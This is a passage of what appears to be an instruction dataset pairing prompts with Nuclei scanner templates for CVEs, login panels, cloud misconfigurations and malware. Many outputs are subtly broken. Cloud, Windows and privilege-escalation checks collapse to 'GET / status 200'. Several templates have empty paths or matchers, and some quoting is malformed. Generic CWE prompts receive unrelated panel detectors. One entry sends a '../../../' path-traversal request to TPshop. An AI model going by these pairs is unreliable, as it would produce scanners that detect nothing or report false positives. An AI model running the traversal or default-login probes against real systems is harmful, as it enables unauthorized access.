explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: backpack-admin-panel\n\ninfo:\n name: Laravel Backpack Admin Login Panel - Detect\n author: shine\n severity: info\n description: Laravel Backpack admin login panel was detected.\n tags: panel,backpack,admin,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login\" \n matchers:\n - type: word\n words:\n - \"Backpack Admin\" \n - \"backpack_alerts\" \n part: body\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Log Hostname Flag Disabled for PostgreSQL Database Instances", "input": "Title: Log Hostname Flag Disabled for PostgreSQL Database Instances\nSummary: Log Hostname Flag Disabled for PostgreSQL Database Instances. Ensure that the \"log_hostname\" database flag is enabled for your Google Cloud PostgreSQL database instances in order to assist with incident response and tracking usage in an environment utilizing dynamic IP addresses. There is a potential cost to server performance caused by hostname logging.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-postgresql-log-hostname-disabled\n\ninfo:\n name: Log Hostname Flag Disabled for PostgreSQL Database Instances\n author: princechaddha\n severity: medium\n description: Ensure that the \"log_hostname\" database flag is enabled for your Google Cloud PostgreSQL database instances in order to assist with incident response and tracking usage in an environment utilizing dynamic IP addresses. There is a potential cost to server performance caused by hostname logging.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,postgresql,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-postgresql-log-hostname-disabled"} +{"instruction": "Generate a Nuclei template for: GKE Node Pools Without Secure Boot Enabled", "input": "Title: GKE Node Pools Without Secure Boot Enabled\nSummary: GKE Node Pools Without Secure Boot Enabled. Ensure that the Secure Boot security feature is enabled for your GKE cluster nodes to protect them against malware and rootkits. Secure Boot helps ensure that the system runs only authentic software by verifying the digital signature of all boot components, and halts the boot process if signature verification fails.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-gke-secure-boot-disabled\n\ninfo:\n name: GKE Node Pools Without Secure Boot Enabled\n author: princechaddha\n severity: medium\n description: Ensure that the Secure Boot security feature is enabled for your GKE cluster nodes to protect them against malware and rootkits. Secure Boot helps ensure that the system runs only authentic software by verifying the digital signature of all boot components, and halts the boot process if signature verification fails.\n tags: cloud,devops,gcp,gcloud,gke,kubernetes,security,boot,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-gke-secure-boot-disabled"} +{"instruction": "Generate a Nuclei template for CVE-2014-1843", "input": "Title: Path Traversal in southrivertech titan_ftp_server\nSummary: Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to obtain the property information of an arbitrary home folder via a Properties action with a .. (dot dot) in the src parameter.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: southrivertech titan_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-1843\n\ninfo:\n name: Titan FTP Server < 10.40 - User Properties Traversal\n author: pussycat0x\n severity: medium\n description: Titan FTP Server versions prior to 10.40 build 1829 contain a directory traversal vulnerability that allows remote attackers to view \"Properties\" of user folders via path traversal. This enables user enumeration and access to sensitive user information that could aid in launching further attacks.\n tags: cve,cve2014,network,ftp,titan-ftp,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-1843"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: tpshop-directory-traversal\n\ninfo:\n name: TPshop - Local File Inclusion\n author: pikpikcu\n severity: high\n description: TPshop is vulnerable to local file inclusion.\n tags: tpshop,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../\" \n matchers:\n - type: word\n words:\n - \"\"state\":\"SUCCESS\"\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for: Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress Detection", "input": "Title: Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress Detection\nSummary: Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-burst-statistics\n\ninfo:\n name: Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress Detection\n author: ricardomaia\n severity: info\n description: Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-burst-statistics"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: nagvis-panel\n\ninfo:\n name: NagVis Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: NagVis login panel was detected.\n tags: panel,nagvis,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/nagvis/frontend/nagvis-js/index.php\" \n matchers:\n - type: word\n words:\n - \"/nagvis/userfiles\" \n - \"NagVis\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Automountd Service Enabled", "input": "Title: Automountd Service Enabled\nSummary: Automountd Service Enabled. The automountd service, when enabled or running, allowed a local attacker to execute arbitrary commands with root privileges by exploiting automatic mount options. This misconfiguration led to local privilege escalation.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: linux-automountd-enabled\n\ninfo:\n name: Automountd Service Enabled\n author: songyaeji\n severity: medium\n description: The automountd service, when enabled or running, allowed a local attacker to execute arbitrary commands with root privileges by exploiting automatic mount options. This misconfiguration led to local privilege escalation.\n tags: local,linux,privesc,kisa\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "linux-automountd-enabled"} +{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: jenkins-weak-password\n\ninfo:\n name: Jenkins Default Login\n author: Zandros0\n severity: high\n description: Jenkins credentials of admin:admin were discovered.\n tags: jenkins,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} +{"instruction": "Generate a Nuclei template for CVE-2017-18492", "input": "Title: Cross-Site Scripting (XSS) in bestwebsoft contact_form_to_db\nSummary: The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: bestwebsoft contact_form_to_db\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-18492\n\ninfo:\n name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\n tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2017-18492"} +{"instruction": "Generate a Nuclei template for: Google Drive API Test", "input": "Title: Google Drive API Test\nSummary: Google Drive API Test. Tags: token-spray, google, drive\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-google-drive\n\ninfo:\n name: Google Drive API Test\n author: geeknik\n severity: info\n description: Google Drive API Test\n tags: token-spray,google,drive,intrusive\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"File not found: {{randstr}}.txt.\" \n part: body", "category": "generic", "severity": "info", "id": "api-google-drive"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cisco-secure-cn\n\ninfo:\n name: Cisco Secure CN Login Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: Cisco Secure CN login panel was detected.\n tags: panel,cisco,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"<title>Cisco Secure CN\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Drupal User Enumeration [Redirect]", "input": "Title: Drupal User Enumeration [Redirect]\nSummary: Drupal User Enumeration [Redirect]. Tags: drupal, misconfig, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: drupal-user-enum-redirect\n\ninfo:\n name: Drupal User Enumeration [Redirect]\n author: 0w4ys\n severity: info\n description: Drupal User Enumeration [Redirect]\n tags: drupal,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/user/0\" \n - \"{{BaseURL}}/user/1\" \n - \"{{BaseURL}}/user/2\" \n - \"{{BaseURL}}/user/3\" \n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 301", "category": "generic", "severity": "info", "id": "drupal-user-enum-redirect"} +{"instruction": "Generate a Nuclei template for: Dkron - Detect", "input": "Title: Dkron - Detect\nSummary: Dkron - Detect. detected a Dkron server, a distributed and fault-tolerant job scheduling system for cloud-native environments.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dkron-detect\n\ninfo:\n name: Dkron - Detect\n author: icarot\n severity: info\n description: detected a Dkron server, a distributed and fault-tolerant job scheduling system for cloud-native environments.\n tags: tech,dkron,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/\" \n matchers:\n - type: word\n words:\n - \"Dkron\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dkron-detect"} +{"instruction": "Generate a Nuclei template for CVE-2021-31581", "input": "Title: Vulnerability (CWE-269) in akkadianlabs ova_appliance and others\nSummary: The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later).\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: high\nAffected Products: akkadianlabs ova_appliance, akkadianlabs provisioning_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31581\n\ninfo:\n name: Akkadian Provisioning Manager - Information Disclosure\n author: geeknik\n severity: medium\n description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.\n tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pme/database/pme/phinx.yml\" \n matchers:\n - type: word\n words:\n - \"host:\" \n - \"name:\" \n - \"pass:\" \n condition: and\n - type: word\n words:\n - \"html>\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-31581"} +{"instruction": "Generate a Nuclei template for: Azure AKS RBAC Not Enabled", "input": "Title: Azure AKS RBAC Not Enabled\nSummary: Azure AKS RBAC Not Enabled. Ensure that Kubernetes Role-Based Access Control (RBAC) is enabled for all Azure Kubernetes Service (AKS) clusters in order to achieve fine-grained control over AKS cluster resources. The Kubernetes Role-Based Access Control (RBAC) represents an efficient method of regulating access to Azure Kubernetes Service resources based on the roles of individual users or groups within an organization.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-aks-rbac-unconfigured\n\ninfo:\n name: Azure AKS RBAC Not Enabled\n author: princechaddha\n severity: medium\n description: Ensure that Kubernetes Role-Based Access Control (RBAC) is enabled for all Azure Kubernetes Service (AKS) clusters in order to achieve fine-grained control over AKS cluster resources. The Kubernetes Role-Based Access Control (RBAC) represents an efficient method of regulating access to Azure Kubernetes Service resources based on the roles of individual users or groups within an organization.\n tags: cloud,devops,azure,microsoft,aks,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-aks-rbac-unconfigured"} +{"instruction": "Generate a Nuclei template for: System Restore Not Configured", "input": "Title: System Restore Not Configured\nSummary: System Restore Not Configured. Checks if System Restore is not configured, which can prevent recovery from system issues.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: windows-system-restore-not-configured\n\ninfo:\n name: System Restore Not Configured\n author: princechaddha\n severity: medium\n description: Checks if System Restore is not configured, which can prevent recovery from system issues.\n tags: windows,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "windows-system-restore-not-configured"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Elastic Info", "input": "Title: Content-Security-Policy Bypass - Elastic Info\nSummary: Content-Security-Policy Bypass - Elastic Info. Tags: xss, csp-bypass, elastic-info\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: elastic-info-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Elastic Info\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Elastic Info\n tags: xss,csp-bypass,elastic-info,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"elastic.co\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "elastic-info-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2022-2546", "input": "Title: Unknown Vulnerability in servmask all-in-one_wp_migration\nSummary: The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: servmask all-in-one_wp_migration\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2546\n\ninfo:\n name: WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-2546"} +{"instruction": "Generate a Nuclei template for: MongoDB Exception - Page", "input": "Title: MongoDB Exception - Page\nSummary: MongoDB Exception - Page. Tags: error, mongodb, log\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mongodb-exception-page\n\ninfo:\n name: MongoDB Exception - Page\n author: DhiyaneshDk\n severity: info\n description: MongoDB Exception - Page\n tags: error,mongodb,log,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"MongoDB Exception\" \n part: body", "category": "generic", "severity": "info", "id": "mongodb-exception-page"} +{"instruction": "Generate a Nuclei template for: UFIDA U8 CRM getemaildata.php - Arbitrary File Read", "input": "Title: UFIDA U8 CRM getemaildata.php - Arbitrary File Read\nSummary: UFIDA U8 CRM getemaildata.php - Arbitrary File Read. There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yonyou-u8-crm-lfi\n\ninfo:\n name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read\n author: SleepingBag945\n severity: high\n description: There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.\n tags: yonyou,u8-crm,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "yonyou-u8-crm-lfi"} +{"instruction": "Generate a Nuclei template for: WordPress Debug Log - Exposure", "input": "Title: WordPress Debug Log - Exposure\nSummary: WordPress Debug Log - Exposure. Exposed Wordpress debug log.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: wordpress-debug-log\n\ninfo:\n name: WordPress Debug Log - Exposure\n author: geraldino2,dwisiswant0,philippedelteil,FLX\n severity: low\n description: Exposed Wordpress debug log.\n tags: wp,wordpress,log,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/{{paths}}/debug.log\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "low", "id": "wordpress-debug-log"} +{"instruction": "Generate a Nuclei template for: Julia - Privilege Escalation", "input": "Title: Julia - Privilege Escalation\nSummary: Julia - Privilege Escalation. Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. Julia is known for its speed and ease of use, and it has a growing community of users and developers.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-julia\n\ninfo:\n name: Julia - Privilege Escalation\n author: daffainfo\n severity: high\n description: Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. Julia is known for its speed and ease of use, and it has a growing community of users and developers.\n tags: code,linux,julia,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-julia"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: drone-ci-panel\n\ninfo:\n name: Drone CI Login Panel - Detect\n author: Yuzhe-zhang-0\n severity: info\n description: Drone CI login panel was detected.\n tags: panel,droneci,cicd,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/welcome\" \n matchers:\n - type: word\n words:\n - \"Drone CI\" \n - \"Drone | Continuous Integration\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Azure API Management HTTPS Enforcement Not Configured", "input": "Title: Azure API Management HTTPS Enforcement Not Configured\nSummary: Azure API Management HTTPS Enforcement Not Configured. Ensure that your Azure API Management APIs are configured to enforce HTTPS for all API calls in order to provide secure, encrypted communication, protect data integrity, user privacy, and comply with industry standards.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-apim-https-enforcement-missing\n\ninfo:\n name: Azure API Management HTTPS Enforcement Not Configured\n author: princechaddha\n severity: high\n description: Ensure that your Azure API Management APIs are configured to enforce HTTPS for all API calls in order to provide secure, encrypted communication, protect data integrity, user privacy, and comply with industry standards.\n tags: cloud,devops,azure,microsoft,apim,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-apim-https-enforcement-missing"} +{"instruction": "Generate a Nuclei template for: WonderCMS Detect", "input": "Title: WonderCMS Detect\nSummary: WonderCMS Detect. Tags: tech, wondercms, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wondercms-detect\n\ninfo:\n name: WonderCMS Detect\n author: pikpikcu\n severity: info\n description: WonderCMS Detect\n tags: tech,wondercms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Set-Cookie: wondercms_\" \n part: header\n - type: word\n words:\n - \"Powered by WonderCMS\" \n - \"https://www.wondercms.com\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "wondercms-detect"} +{"instruction": "Generate a Nuclei template for: Malwared (Build Your Own Botnet) - Detect", "input": "Title: Malwared (Build Your Own Botnet) - Detect\nSummary: Malwared (Build Your Own Botnet) - Detect. Detects the presence of the Malwared - Build Your Own Botnet tool on the target system.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: malwared-byob\n\ninfo:\n name: Malwared (Build Your Own Botnet) - Detect\n author: pdteam\n severity: info\n description: Detects the presence of the Malwared - Build Your Own Botnet tool on the target system.\n tags: panel,malware,byob,botnet,oss,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Build Your Own Botnet\" \n - \"Post-Exploitation Framework\" \n - \"malwaredllc/byob\"", "category": "generic", "severity": "info", "id": "malwared-byob"} +{"instruction": "Generate a Nuclei template for: Datagerry - Default Login", "input": "Title: Datagerry - Default Login\nSummary: Datagerry - Default Login. Datagerry was using default username and password was discovered.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: datagerry-default-login\n\ninfo:\n name: Datagerry - Default Login\n author: gy741\n severity: high\n description: Datagerry was using default username and password was discovered.\n tags: datagerry,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"token\":\" \n - \"\"token_issued_at\":\" \n - \"\"token_expire\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "datagerry-default-login"} +{"instruction": "Generate a Nuclei template for: CryptXXX Dropper Malware - Detect", "input": "Title: CryptXXX Dropper Malware - Detect\nSummary: CryptXXX Dropper Malware - Detect. Tags: malware, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cryptxxx-dropper-malware\n\ninfo:\n name: CryptXXX Dropper Malware - Detect\n author: daffainfo\n severity: info\n description: CryptXXX Dropper Malware - Detect\n tags: malware,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cryptxxx-dropper-malware"} +{"instruction": "Generate a Nuclei template for: brighthr phishing Detection", "input": "Title: brighthr phishing Detection\nSummary: brighthr phishing Detection. A brighthr phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: brighthr-phish\n\ninfo:\n name: brighthr phishing Detection\n author: rxerium\n severity: info\n description: A brighthr phishing website was detected\n tags: phishing,brighthr,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"HR Software For SMEs | Human Resources Software | BrightHR\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "brighthr-phish"} +{"instruction": "Generate a Nuclei template for CVE-2024-29868", "input": "Title: Vulnerability (CWE-338) in apache streampipes\nSummary: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes\u00a0user self-registration and password recovery mechanism.\nThis allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.\nThis issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n\nVulnerability Type: Vulnerability (CWE-338)\nSeverity: critical\nAffected Products: apache streampipes\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-29868\n\ninfo:\n name: Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation\n author: Alessandro Albani - DEVisions\n severity: critical\n description: Apache StreamPipes from version 0.69.0 through 0.93.0 uses a cryptographically weak Pseudo-Random Number Generator (PRNG) in the recovery token generation mechanism. Given a valid token it's possible to predict all past and future generated tokens.\n tags: cve,cve2024,apache,streampipes,account-takeover,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/streampipes-backend/api/v2/auth/settings\" \n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}/streampipes-backend/api/openapi.json\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-29868"} +{"instruction": "Generate a Nuclei template for CVE-2021-33045", "input": "Title: Authentication Bypass in dahuasecurity ipc-hum7xxx_firmware and others\nSummary: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: dahuasecurity ipc-hum7xxx_firmware, dahuasecurity ipc-hx3xxx_firmware, dahuasecurity ipc-hx5xxx_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33045\n\ninfo:\n name: Dahua IPC/VTH/VTO - Authentication Bypass\n author: phantomowl\n severity: critical\n description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\n tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"session\":\" \n - \"\"result\":true\" \n - \"\"keepAliveInterval\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-33045"} +{"instruction": "Generate a Nuclei template for: Unrestricted MySQL Access on EC2", "input": "Title: Unrestricted MySQL Access on EC2\nSummary: Unrestricted MySQL Access on EC2. Identifies unrestricted inbound access to MySQL database servers on Amazon EC2 instances, specifically targeting TCP port 3306.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: ec2-unrestricted-mysql\n\ninfo:\n name: Unrestricted MySQL Access on EC2\n author: princechaddha\n severity: critical\n description: Identifies unrestricted inbound access to MySQL database servers on Amazon EC2 instances, specifically targeting TCP port 3306.\n tags: cloud,devops,aws,amazon,ec2,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "ec2-unrestricted-mysql"} +{"instruction": "Generate a Nuclei template for: TLS SNI Proxy Detection", "input": "Title: TLS SNI Proxy Detection\nSummary: TLS SNI Proxy Detection. Tags: misconfig, ssrf, oast\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tls-sni-proxy\n\ninfo:\n name: TLS SNI Proxy Detection\n author: pdteam\n severity: info\n description: TLS SNI Proxy Detection\n tags: misconfig,ssrf,oast,tls,sni,proxy,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol", "category": "generic", "severity": "info", "id": "tls-sni-proxy"} +{"instruction": "Generate a Nuclei template for: Redis Honeypot - Detect", "input": "Title: Redis Honeypot - Detect\nSummary: Redis Honeypot - Detect. A Redis honeypot has been identified.\nThe response to the 'QUIT' command differs from real installations, signaling a possible deceptive setup.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: redis-honeypot-detect\n\ninfo:\n name: Redis Honeypot - Detect\n author: UnaPibaGeek\n severity: info\n description: A Redis honeypot has been 